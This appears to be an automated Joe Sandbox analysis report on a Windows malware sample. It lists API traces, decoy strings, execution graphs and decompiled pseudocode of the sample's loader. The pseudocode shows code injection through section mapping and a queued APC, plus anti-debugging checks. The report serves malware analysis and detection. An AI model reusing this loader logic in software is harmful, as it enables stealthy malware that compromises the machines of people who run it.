                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 5763525157c9af74562bc5ec1667a25c374f8ca3a72bfaf80d8df7f7b0acff5c
                                                            • Instruction ID: c21158c100e73684eeb91486f4d22567e35e3a87aa695523240dd804d3856da9
                                                            • Opcode Fuzzy Hash: 5763525157c9af74562bc5ec1667a25c374f8ca3a72bfaf80d8df7f7b0acff5c
                                                            • Instruction Fuzzy Hash: B3E0C2B0408755EBC7208B50E989A677BF5AB08340F2045DD929AAB141CA706580F755
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 45 b29d5e-b29d73 LocalAlloc 46 b2b00f 45->46 46->46
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000040,?), ref: 00B29D6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 4958111e46b0db01031ab94d08d2d317dedb0035050c053ef021dc9506a32ced
                                                            • Instruction ID: 4dad4db2d4ef086c538d10ad40b794aa6d82cd81282e0857a3b88c685e3987b2
                                                            • Opcode Fuzzy Hash: 4958111e46b0db01031ab94d08d2d317dedb0035050c053ef021dc9506a32ced
                                                            • Instruction Fuzzy Hash: B3C08060404315F5D7019B50645BD593960B704300F100595D11552145DA7046419715
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00B28385
                                                            • StrokePath.GDI32(00000000), ref: 00B2838D
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00B28395
                                                            • CreateActCtxW.KERNEL32(?), ref: 00B283B9
                                                            • CloseHandle.KERNEL32(?), ref: 00B283D5
                                                            • GetTapeStatus.KERNEL32(00000000), ref: 00B283DD
                                                            • SetCurrentDirectoryA.KERNEL32(00B27AB8), ref: 00B283E7
                                                            Strings
                                                            • Vira yiqu poros kiqu xiborefo lenixed vec, xrefs: 00B2840A
                                                            • Sowaqu xagogici hega mehiyeq kegib vodal wed yihesohe niteco layadome, xrefs: 00B2841F
                                                            • Cibovido nosequop cakiy jivage devicequ xohefeci giti nisam, xrefs: 00B2834D
                                                            • Jeho rotaceto wed kegejaf, xrefs: 00B28434
                                                            • Vas bahotiga, xrefs: 00B2843B
                                                            • Dove, xrefs: 00B29763
                                                            • Geyofe goyabor sihosata bepafem xovaxek, xrefs: 00B2974D
                                                            • Yamadep kepexok kod maneseka, xrefs: 00B283F4
                                                            • Gerayido wowi refa todiquac xagiheye cek nikigon, xrefs: 00B28418
                                                            • Sehiti viwo xejavi rowaje lowiye quiquig fehoquib yegov jajexawi horiquo, xrefs: 00B28346
                                                            • Ciquek yavi gej quide haqueto lodise felig joquolaw hofasofe mevifeta xari, xrefs: 00B28411
                                                            • Pih tivago yotefaxi, xrefs: 00B283ED
                                                            • Yofixece dip, xrefs: 00B28368
                                                            • Xonoxex makojec yoyis, xrefs: 00B29771
                                                            • Quotamis miro, xrefs: 00B28358
                                                            • Mobiw yado quagiy sonano quif, xrefs: 00B2976A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$CloseCreateHandlePathServiceStartStatusStrokeTape
                                                            • String ID: Cibovido nosequop cakiy jivage devicequ xohefeci giti nisam$Ciquek yavi gej quide haqueto lodise felig joquolaw hofasofe mevifeta xari$Dove$Gerayido wowi refa todiquac xagiheye cek nikigon$Geyofe goyabor sihosata bepafem xovaxek$Jeho rotaceto wed kegejaf$Mobiw yado quagiy sonano quif$Pih tivago yotefaxi$Quotamis miro$Sehiti viwo xejavi rowaje lowiye quiquig fehoquib yegov jajexawi horiquo$Sowaqu xagogici hega mehiyeq kegib vodal wed yihesohe niteco layadome$Vas bahotiga$Vira yiqu poros kiqu xiborefo lenixed vec$Xonoxex makojec yoyis$Yamadep kepexok kod maneseka$Yofixece dip
                                                            • API String ID: 4009143142-2936482510
                                                            • Opcode ID: b53b1938055fd2d862c04ecf705812adb7e27608dd3b9b68163526efe1ad12e2
                                                            • Instruction ID: 83ee1cb944617297f23af6d4e8d67600783873252cc6955bba5ec6a12b96181b
                                                            • Opcode Fuzzy Hash: b53b1938055fd2d862c04ecf705812adb7e27608dd3b9b68163526efe1ad12e2
                                                            • Instruction Fuzzy Hash: 3F411971C49268EBCB14CFA8E8497AEBBF0EF15305F108099E519AB341CB745A45CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00B3E92D
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3E944
                                                            • UnhandledExceptionFilter.KERNEL32(00B2606C), ref: 00B3E94F
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3E96D
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00B3E974
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 5d863da605b4f8af145112a94de7744f34597d2e0c2c934ac6e3b5436d40b2f8
                                                            • Instruction ID: d723cf686446c5c238fa1211951c62e2ebd5bd513aa16dc8c45c5e6b7641b297
                                                            • Opcode Fuzzy Hash: 5d863da605b4f8af145112a94de7744f34597d2e0c2c934ac6e3b5436d40b2f8
                                                            • Instruction Fuzzy Hash: 0F2145B8862344DFC708CF59FC85B8E3BA8FB18302F11459AE80993760E7716581DF89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00012260), ref: 00B322DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 4e56d57e7c4c9e5885e516514204ceee73ee59db4e0d56a2879f0db2bacacb0a
                                                            • Instruction ID: b6da399a397242c31ed9c396e3a933a53102bbdde19d07a5f84a3158d3ebdad9
                                                            • Opcode Fuzzy Hash: 4e56d57e7c4c9e5885e516514204ceee73ee59db4e0d56a2879f0db2bacacb0a
                                                            • Instruction Fuzzy Hash: 94B0123214828C37031113E66C098033ACCD5C57307510861F00C82010ED9194414055
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __isctype_l.LIBCMTD ref: 00B358D5
                                                            • __chvalidator_l.LIBCMTD ref: 00B358F5
                                                              • Part of subcall function 00B39FD0: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B3A03F
                                                            • _swprintf_s.LIBCMTD ref: 00B35958
                                                            • __invoke_watson_if_oneof.LIBCMTD ref: 00B35986
                                                            • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B359CB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: Locale$UpdateUpdate::~_$__chvalidator_l__invoke_watson_if_oneof__isctype_l_swprintf_s
                                                            • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                                            • API String ID: 2593626323-2130928175
                                                            • Opcode ID: 6349011044188d5a82dcae9c1c4b34086e39a5057be9d9cdc372197b35c54526
                                                            • Instruction ID: 91b95b74ae99bd525b1f29510128c2b90b0714dc220920a15791afe86d1faa4e
                                                            • Opcode Fuzzy Hash: 6349011044188d5a82dcae9c1c4b34086e39a5057be9d9cdc372197b35c54526
                                                            • Instruction Fuzzy Hash: 66418F70904758EFDB18EBA4CC46BAEB7F5AF54300F304598E509AF296DB70AA04CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • getSystemCP.LIBCMTD ref: 00B372D7
                                                              • Part of subcall function 00B371B0: GetOEMCP.KERNEL32(00000000,5284C274,00C31AE8,000000FF,?,00B36F68,?), ref: 00B3720B
                                                              • Part of subcall function 00B371B0: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00B3721E
                                                            • setSBCS.LIBCMTD ref: 00B372EC
                                                            • setSBUpLow.LIBCMTD ref: 00B37448
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: Locale$SystemUpdateUpdate::~_
                                                            • String ID:
                                                            • API String ID: 2101441384-0
                                                            • Opcode ID: d93a29af39243cd657ef8eae11d6174748d7bf207502025c8dcb76bbef84447e
                                                            • Instruction ID: 44c6e1d1ac77acffd5ea99e845bf38a80f5d34f78ed01dfce85f3706d00c5c46
                                                            • Opcode Fuzzy Hash: d93a29af39243cd657ef8eae11d6174748d7bf207502025c8dcb76bbef84447e
                                                            • Instruction Fuzzy Hash: CAB15BB0948119EBCB28CF54C880AAEBBF1FF54314F24C599D8265B341DB30EA41DF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 00B30740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                            • Associated: 00000000.00000002.477988456.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478029468.0000000000B48000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478185803.0000000000C32000.00000020.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478230729.0000000000C33000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.478243091.0000000000C36000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b20000_OojqjHGE0W.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID: -$KERNEL32.dll$y
                                                            • API String ID: 4139908857-3350792778
                                                            • Opcode ID: 48d3ed48848f7eefc5571d85210dec56f43901601290263ac23b0998924593a2
                                                            • Instruction ID: 815327a7b028ec971328a0f695e870da8c791706e11daae128640ce9dcb1e43b
                                                            • Opcode Fuzzy Hash: 48d3ed48848f7eefc5571d85210dec56f43901601290263ac23b0998924593a2
                                                            • Instruction Fuzzy Hash: 79F0F8B0C15218EBDB00EFD0D849BDEBBF4BB04348F104188D5056B290C7B92648CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:53.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:30.9%
                                                            Total number of Nodes:110
                                                            Total number of Limit Nodes:11
                                                            execution_graph 391 401a98 392 401ab1 391->392 403 401e35 ConvertStringSecurityDescriptorToSecurityDescriptorA 392->403 394 401ac5 404 401479 394->404 396 401aea 397 401b45 ExitThread 396->397 398 401aee lstrlenW 396->398 409 401b52 GetSystemTimeAsFileTime _aulldiv _snwprintf 398->409 402 401b11 420 4011c1 402->420 403->394 405 4014bf 404->405 407 40153c 405->407 431 401935 HeapAlloc 405->431 432 401265 HeapFree 405->432 407->396 410 401bb0 CreateFileMappingW 409->410 411 401bab 409->411 412 401c13 GetLastError 410->412 413 401bcb 410->413 411->410 414 401bf4 412->414 415 401be4 MapViewOfFile 413->415 416 401bd6 GetLastError 413->416 414->402 415->414 418 401c02 GetLastError 415->418 416->415 417 401bdf 416->417 419 401c0a CloseHandle 417->419 418->414 418->419 419->414 433 4012d3 420->433 422 401259 422->397 423 4011fd 423->422 424 401247 423->424 446 401ea1 423->446 457 401265 HeapFree 424->457 430 40123f GetLastError 430->424 431->405 432->405 458 401935 HeapAlloc 433->458 435 4012e1 436 4012eb GetModuleHandleA GetProcAddress 435->436 445 401397 435->445 437 401322 GetProcAddress 436->437 438 401390 436->438 437->438 440 401338 GetProcAddress 437->440 438->445 465 401265 HeapFree 438->465 440->438 441 40134e GetProcAddress 440->441 441->438 442 401364 GetProcAddress 441->442 442->438 443 40137a 442->443 459 40188d NtCreateSection 443->459 445->423 447 40121c 446->447 449 401ec4 446->449 447->424 452 40105a VirtualProtect 447->452 448 401ed5 LoadLibraryA 448->447 448->449 449->447 449->448 451 401f3e 449->451 450 401f47 GetProcAddress 450->451 451->449 451->450 453 401132 452->453 454 4010a3 452->454 453->424 453->430 454->453 455 4010f9 VirtualProtect 454->455 455->454 456 40110e GetLastError 455->456 456->454 457->422 458->435 460 4018f1 459->460 461 40191e 459->461 466 4013b7 NtMapViewOfSection 460->466 461->438 464 401905 memset 464->461 465->445 467 4013eb 466->467 467->461 467->464 468 401e5b 
HeapCreate 469 401e74 GetModuleHandleA GetCommandLineW 468->469 470 401e99 ExitProcess 468->470 473 4015c0 469->473 502 401400 CreateEventA 473->502 475 4015cc 477 4015f5 NtQuerySystemInformation 475->477 482 401737 HeapDestroy 475->482 509 401935 HeapAlloc 475->509 510 401c24 475->510 530 401265 HeapFree 475->530 477->475 481 401654 481->482 516 401d45 481->516 482->470 485 40169b CreateThread 489 401728 GetLastError 485->489 490 4016cf QueueUserAPC 485->490 486 401669 GetLongPathNameW 486->485 488 40167d 486->488 528 401935 HeapAlloc 488->528 495 40172d 489->495 493 401704 490->493 494 4016e9 GetLastError TerminateThread CloseHandle SetLastError 490->494 492 401687 492->485 497 401690 GetLongPathNameW 492->497 493->489 498 401708 WaitForSingleObject 493->498 494->493 495->482 496 401735 GetLastError 495->496 496->482 529 401265 HeapFree 497->529 500 401723 CloseHandle 498->500 501 401718 GetExitCodeThread 498->501 500->495 501->500 503 401472 GetLastError 502->503 504 40141e GetVersion 502->504 505 401428 504->505 506 401435 GetCurrentProcessId OpenProcess 505->506 507 40146d 505->507 508 401462 506->508 507->475 508->475 509->475 511 401c40 510->511 512 401c4b VirtualAlloc 511->512 513 40163f Sleep 511->513 512->513 515 401c8b 512->515 513->475 513->481 514 401d23 VirtualFree 514->513 515->514 531 401935 HeapAlloc 516->531 518 401d63 519 401d69 GetModuleFileNameW 518->519 520 401665 518->520 521 401d9a 519->521 525 401d7b 519->525 520->485 520->486 521->520 523 401da5 521->523 524 401dac GetLastError 521->524 523->520 534 401265 HeapFree 524->534 525->519 525->521 532 401265 HeapFree 525->532 533 401935 HeapAlloc 525->533 528->492 529->485 530->475 531->518 532->525 533->525 534->523

                                                            Callgraph

                                                            Control-flow Graph

                                                            C-Code - Quality: 88%
                                                            			E004015C0() {
                                                            				long _v8;
                                                            				long _v12;
                                                            				long _v16;
                                                            				void* _v40;
                                                            				void* __edi;
                                                            				long _t31;
                                                            				long _t33;
                                                            				long _t34;
                                                            				void* _t37;
                                                            				long _t40;
                                                            				long _t41;
                                                            				long _t45;
                                                            				void* _t48;
                                                            				struct _SECURITY_ATTRIBUTES* _t50;
                                                            				signed int _t54;
                                                            				signed int _t55;
                                                            				struct _SECURITY_ATTRIBUTES* _t59;
                                                            				long _t61;
                                                            				signed int _t62;
                                                            				void* _t66;
                                                            				void* _t69;
                                                            				signed int _t71;
                                                            				signed int _t72;
                                                            				void* _t75;
                                                            				intOrPtr* _t76;
                                                            
                                                            				_t31 = E00401400();
                                                            				_t59 = 0;
                                                            				_v8 = _t31;
                                                            				if(_t31 != 0) {
                                                            					return _t31;
                                                            				}
                                                            				do {
                                                            					_t71 = 0;
                                                            					_v16 = _t59;
                                                            					_v12 = 0x30;
                                                            					do {
                                                            						_t66 = E00401935(_v12);
                                                            						if(_t66 == _t59) {
                                                            							_v8 = 8;
                                                            						} else {
                                                            							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
                                                            							_t62 = _t54;
                                                            							_t55 = _t54 & 0x0000ffff;
                                                            							_v8 = _t55;
                                                            							if(_t55 == 4) {
                                                            								_v12 = _v12 + 0x30;
                                                            							}
                                                            							_t72 = 0x13;
                                                            							_t15 = _t62 + 1; // 0x1
                                                            							_t71 =  *_t66 % _t72 + _t15;
                                                            							E00401265(_t66);
                                                            						}
                                                            					} while (_v8 != _t59);
                                                            					_t33 = E00401C24(_t66, _t71); // executed
                                                            					_v8 = _t33;
                                                            					Sleep(_t71 << 4); // executed
                                                            					_t34 = _v8;
                                                            				} while (_t34 == 9);
                                                            				if(_t34 != _t59) {
                                                            					L28:
                                                            					return _t34;
                                                            				}
                                                            				if(E00401D45(_t62,  &_v12) != 0) {
                                                            					 *0x403178 = _t59;
                                                            					L18:
                                                            					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x403180, _t59, _t59); // executed
                                                            					_t75 = _t37;
                                                            					if(_t75 == _t59) {
                                                            						L25:
                                                            						_v8 = GetLastError();
                                                            						L26:
                                                            						_t34 = _v8;
                                                            						if(_t34 == 0xffffffff) {
                                                            							_t34 = GetLastError();
                                                            						}
                                                            						goto L28;
                                                            					}
                                                            					_t40 = QueueUserAPC(E00401A98, _t75,  &_v40); // executed
                                                            					if(_t40 == 0) {
                                                            						_t45 = GetLastError();
                                                            						_v16 = _t45;
                                                            						TerminateThread(_t75, _t45);
                                                            						CloseHandle(_t75);
                                                            						_t75 = 0;
                                                            						SetLastError(_v16);
                                                            					}
                                                            					if(_t75 == 0) {
                                                            						goto L25;
                                                            					} else {
                                                            						_t41 = WaitForSingleObject(_t75, 0xffffffff);
                                                            						_v8 = _t41;
                                                            						if(_t41 == 0) {
                                                            							GetExitCodeThread(_t75,  &_v8);
                                                            						}
                                                            						CloseHandle(_t75);
                                                            						goto L26;
                                                            					}
                                                            				}
                                                            				_t76 = __imp__GetLongPathNameW;
                                                            				_t61 = _v12;
                                                            				_t48 =  *_t76(_t61, _t59, _t59); // executed
                                                            				_t69 = _t48;
                                                            				if(_t69 == 0) {
                                                            					L15:
                                                            					 *0x403178 = _t61;
                                                            					L16:
                                                            					_t59 = 0;
                                                            					goto L18;
                                                            				}
                                                            				_t23 = _t69 + 2; // 0x2
                                                            				_t50 = E00401935(_t69 + _t23);
                                                            				 *0x403178 = _t50;
                                                            				if(_t50 == 0) {
                                                            					goto L15;
                                                            				}
                                                            				 *_t76(_t61, _t50, _t69); // executed
                                                            				E00401265(_t61);
                                                            				goto L16;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00401400: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004015CC), ref: 0040140F
                                                              • Part of subcall function 00401400: GetVersion.KERNEL32 ref: 0040141E
                                                              • Part of subcall function 00401400: GetCurrentProcessId.KERNEL32 ref: 0040143A
                                                              • Part of subcall function 00401400: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401453
                                                              • Part of subcall function 00401935: HeapAlloc.KERNEL32(00000000,?,004015EF,00000030,?,00000000), ref: 00401941
                                                            • NtQuerySystemInformation.NTDLL ref: 004015FF
                                                            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401646
                                                            • GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401675
                                                            • GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401693
                                                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004016BD
                                                            • QueueUserAPC.KERNELBASE(00401A98,00000000,?,?,00000000), ref: 004016D9
                                                            • GetLastError.KERNEL32(?,00000000), ref: 004016E9
                                                            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004016F0
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004016F7
                                                            • SetLastError.KERNEL32(?,?,00000000), ref: 004016FE
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170B
                                                            • GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 0040171D
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401724
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00401728
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00401735
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
                                                            • String ID: 0
                                                            • API String ID: 2806485730-4108050209
                                                            • Opcode ID: 64f5e00dd3e9df56bafb44a3b12719b211d84c9052b4447aa62019f6059b615a
                                                            • Instruction ID: 3b3c7b31539dcb68cec7446801a6dcec4e678bc0dd0ee261a99a295e6f7dabed
                                                            • Opcode Fuzzy Hash: 64f5e00dd3e9df56bafb44a3b12719b211d84c9052b4447aa62019f6059b615a
                                                            • Instruction Fuzzy Hash: 1E4175B1D00215BBDB11AFB58D8899F7ABCEF49354B14447BE501F32A0D7788E45CB68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (basic blocks as node: address range [call], followed by successor nodes)
                                                            • 78: 40188d-4018ef NtCreateSection -> 79, 80
                                                            • 79: 4018f1-4018fa call 4013b7 -> 83
                                                            • 80: 401926-40192a -> 86
                                                            • 83: 4018ff-401903 -> 84, 85
                                                            • 84: 401905-40191c memset -> 86
                                                            • 85: 40191e-401924 -> 86
                                                            • 86: 40192c-401932
                                                            C-Code - Quality: 72%
                                                            			E0040188D(intOrPtr* __eax, void** _a4) {	// __eax: 0x20-byte context built by E004012D3 (+0 section handle, +4 size, +8 page protection, +0xc..+0x1c resolved imports); *_a4 receives the view base
                                                            				int _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				int _v32;
                                                            				intOrPtr _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				void* _v48;
                                                            				void* __esi;
                                                            				long _t34;
                                                            				void* _t39;
                                                            				void* _t47;
                                                            				intOrPtr* _t48;
                                                            
                                                            				_t48 = __eax;	// 0x00401896
                                                            				asm("stosd");	// 0x0040189d  six stosd zero 24 bytes of locals (the OBJECT_ATTRIBUTES below)
                                                            				asm("stosd");	// 0x0040189e
                                                            				asm("stosd");	// 0x0040189f
                                                            				asm("stosd");	// 0x004018a0
                                                            				asm("stosd");	// 0x004018a1
                                                            				asm("stosd");	// 0x004018b2
                                                            				_v24 =  *((intOrPtr*)(__eax + 4));	// 0x004018b6  MaximumSize (low dword) = size stored at context +4
                                                            				_v16 = 0;	// 0x004018ca  SectionHandle (output)
                                                            				_v12 = 0;	// 0x004018cd  view base (filled in by E004013B7)
                                                            				_v48 = 0x18;	// 0x004018d0  OBJECT_ATTRIBUTES.Length: 24 bytes on x86
                                                            				_v44 = 0;	// 0x004018d7  OBJECT_ATTRIBUTES.RootDirectory
                                                            				_v36 = 0x40;	// 0x004018da  OBJECT_ATTRIBUTES.Attributes = OBJ_CASE_INSENSITIVE (this 0x40 is not a page protection)
                                                            				_v40 = 0;	// 0x004018e1  OBJECT_ATTRIBUTES.ObjectName = NULL: the section is unnamed
                                                            				_v32 = 0;	// 0x004018e4  OBJECT_ATTRIBUTES.SecurityDescriptor
                                                            				_v28 = 0;	// 0x004018e7  OBJECT_ATTRIBUTES.SecurityQualityOfService
                                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);	// 0x004018ea  DesiredAccess 0xf001f = SECTION_ALL_ACCESS; SectionPageProtection from context +8; 0x8000000 = SEC_COMMIT; FileHandle NULL = pagefile-backed
                                                            				if(_t34 < 0) {	// 0x004018ef  NTSTATUS failure
                                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);	// 0x0040192a  import at context +0x18 converts the NTSTATUS into the error code returned below (its name is resolved by GetProcAddress in E004012D3 and not shown in this report)
                                                            				} else {	// 0x004018f1
                                                            					 *_t48 = _v16;	// 0x004018f4  keep the section handle at context +0
                                                            					_t39 = E004013B7(_t48,  &_v12); // executed	// 0x004018fa  map the section into the current process
                                                            					_t47 = _t39;	// 0x004018ff
                                                            					if(_t47 != 0) {	// 0x00401903
                                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);	// 0x00401921  mapping failed: import at context +0x1c is called with the section handle
                                                            					} else {	// 0x00401905
                                                            						memset(_v12, 0, _v24);	// 0x0040190c  zero the whole view
                                                            						 *_a4 = _v12;	// 0x0040191a  hand the view base back to the caller
                                                            					}	// 0x0040191a
                                                            				}	// 0x00401903
                                                            				return _t47;	// 0x00401932  0 on success, otherwise the converted error code
                                                            			}

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,?), ref: 004018EA
                                                              • Part of subcall function 004013B7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018FF,00000002,00000000,?,?,00000000,?,?,004018FF,00000002), ref: 004013E4
                                                            • memset.NTDLL ref: 0040190C
                                                            Strings
                                                            Memory Dump Source
